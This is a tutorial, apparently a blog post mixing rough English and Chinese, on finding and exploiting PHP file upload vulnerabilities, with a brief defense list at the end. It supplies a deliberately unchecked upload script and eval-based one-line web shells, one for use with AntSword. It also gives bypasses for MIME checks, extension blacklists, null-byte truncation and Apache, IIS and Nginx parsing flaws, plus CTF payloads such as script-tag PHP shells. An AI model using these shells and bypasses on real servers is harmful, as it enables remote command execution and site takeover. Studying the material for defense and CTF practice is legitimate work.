2020/1/30 PHP code audit of the file upload vulnerability

0x00 vulnerability Profile

File upload vulnerability refers users to upload an executable script file, and through this script file to obtain the ability to perform server-side command. This attack is the most direct and effective, "file upload" itself is no problem, the problem is that the file is uploaded, the server how to deal with, interpret the file. If the server processing logic of not doing enough security, it will lead to serious consequences.

0x01 vulnerability condition

Files can be uploaded
to know the path to the file upload
upload files can be accessed
uploaded files can be executed

0x02 mining ideas

Upload point upload all call the same class, direct global search function to upload
the black box to find upload points, positioning the code.

0x03 write a uploaded

Let's write a front-end upload

<html>
<head>
<meta charset="UTF-8">
<title>upload.html</title>

</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" name="上传文件">
    <!--<input type="hidden" name="MAX_FILE_SIZE" name="4098">//设置文件上传大小，一般在php.ini里面设置-->

</form>

</body>

</html>

Write a php upload

<?php
$upload_dir = "D:\PHPSTUDY2018\PHPTutorial\WWW\upload";
if(isset($_FILES['file'])){
    $upload_name = $upload_dir . "\\" . $_FILES['file'];
    move_uploaded_file($_FILES['file']['tmp_name'],$upload_name);
    echo "Type:" . $_FILES['file']['type']. "<br >";
    echo "Size:" . ($_FILES['file']['size'] / 1024) . "<br >";
    echo "Name:" . $_FILES['file']['name'];//这三行是我们看一下上传效果。

}else{
    echo"上传失败";
}

Write a simple sentence

<?php
@eval($_POST['777'])


?>

Upload:

See uploaded successfully

After the ants take the sword connection on the line
this is one of the easiest most simple example, just let yourself start to change the direction of the white box. Slowly accumulate

0x04 bypass the file upload

1: The client detected by the detector bypass js

Detection principle

Whether the client to detect user-submitted legal documents through the javascript code
to bypass method

1. Adding allowed to upload file types, so you want to upload type to meet the legitimate

2, remove the call to js validation script so that it can not do the detection of the uploaded file type, so as to bypass - through a review of the same element, view the contents of form form, the form of start tag is

Where the onsubmit = "action return checkFile () is that when click the Upload button and they will trigger js validation script, so this part delete, change can successfully bypass the detection

3, use burpsuite capture, modify the file types to bypass - first suffix malicious script that we want to upload changes to meet the requirements such as file type suffix: webshell.php -> webshell.jpg- when click upload of use burp carried capture, the name changed back to the suffix .php, in order to be able to parse correctly uploaded to the server

2: server-side bypass

1: MIME type detection bypassed

检测原理
当用户上传文件到服务器端的时候，服务器端的程序会获取上传文件的MIME类型，然后用这个获取到的类型来和期望的MIME类型进行匹配，如果匹配不上则说明上传的文件不合法。服务端检测MIME类型的代码如下：

if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')){

 ...//判断过后对文件处理的进一步操作
}

绕过方法

因为服务端检测的是文件的MIME类型，而对这个MIME类型的的值的获取是通过HTTP请求字段里的Content-Type字段 ，所以绕过的方法就是通过修改Content-Type的值，比如修改为image/jpeg；image/png；image/gif等等允许上传类型对应的MIME值
2:黑名单绕过
检测原理

文件类型根据黑名单来检测的原理就是：服务器程序根据一份文件后缀名的名单来判断是否允许当前文件上传到服务器，只要上传的文件的类型能够和这个黑名单里面的类型匹配，那么就禁止该文件上传

绕过方法

1. 文件名大小写绕过
用像AsP， pHp之类的文件名绕过黑名单检测2. 名单列表绕过
用黑名单里没有的名单进行攻击，比如黑名单里没有asa或cer之类
3. 特殊文件名绕过
比如发送的 http包里把文件名改成 test.asp. 或 test.asp_(下划线为空格)，这种命名方式
在windows系统里是不被允许的，所以需要在 burp之类里进行修改，然后绕过验证后，会
被windows系统自动去掉后面的点和空格，但要注意Unix/Linux系统没有这个特性。
4.0x00截断绕过

test.php(0x00).jpg　　test.php%00.jpg

1. .htaccess文件攻击
   6.  解析调用/漏洞绕过
   7:.ini文件攻击
   8：文件头绕过

在木马内容基础上再加了一些文件信息，有点像下面的结构GIF89a<?php phpinfo(); ?>

9：多个Content-Disposition

在IIS的环境下，上传文件时如果存在多个Content-Disposition的话，IIS会取第一个Content-Disposition中的值作为接收参数，而如果waf只是取最后一个的话便会被绕过，Win2k8 + IIS7.0 + PHP

10：目录验证
iis6.0存在写入目录

3：web应用程序解析绕过

1. Apache解析漏洞
解析：test.php.(任意不属于黑名单且也不属于Apache解析白名单的名称)，比如test.php.lala
描述：一个文件名为test.x1.x2.x3的文件，apache会从x3的位置开始尝试解析，如果x3不属于apache能够解析的扩展名，那么apache会尝试去解析x2，直到能够解析到能够解析的为止，否则就会报错
2. IIS解析漏洞
解析 ：test.asp/(任意文件名)|test.asp；(任意文件名) | (任意文件名)/(任意文件名).php

描述：IIS6.0在解析asp格式的时候有两个解析漏洞，一个是如果目录名包含".asp"字符串，
那么这个目录下所有的文件都会按照asp去解析，另一个是只要文件名中含有".asp;"会优先按asp来解析

IIS7.0/7.5是对php解析时有一个类似于Nginx的解析漏洞，对任意文件名只要在URL后面追加上字符串"/任意文件名.php"就会按照php的方式去解析；
3. Nginx解析漏洞
解析： (任意文件名)/(任意文件名).php | (任意文件名)%00.php

描述：目前Nginx主要有这两种漏洞，一个是对任意文件名，在后面添加/任意文件名.php的解析漏洞，比如原本文件名是test.jpg，可以添加为test.jpg/x.php进行解析攻击。
还有一种是对低版本的Nginx可以在任意文件名后面添加%00.php进行解析攻击。

0x05 我打ctf经常用的一句话

1：碰到过一次任意文件上穿漏洞，在config.php中并未发现定义类型Media，请求：upload/.php?Type=Media
2:上传图片马
3:序列化木马：

<?php
class A{
    var $a = "<?php phpinfo()?>";
}
$aa = new A();
echo serialize($aa);
?>

4:php,php3,php4,php5,phtml.pht
5:扩展名绕过
Asp:asa cer cdx
Aspx:ashx asmx ascx
Php:php3 phptml
Jsp:jspx jspf
6:

<script language=php>system("ls")</script>

7:

GIF89a?
<script language="php">eval($_REQUEST[shell])</script>

0x06 防御

文件扩展名服务端白名单校验。

文件内容服务端校验。
上传文件重命名。
隐藏上传文件路径。

参考链接https://www.cnblogs.com/ldhbetter/p/9190556.html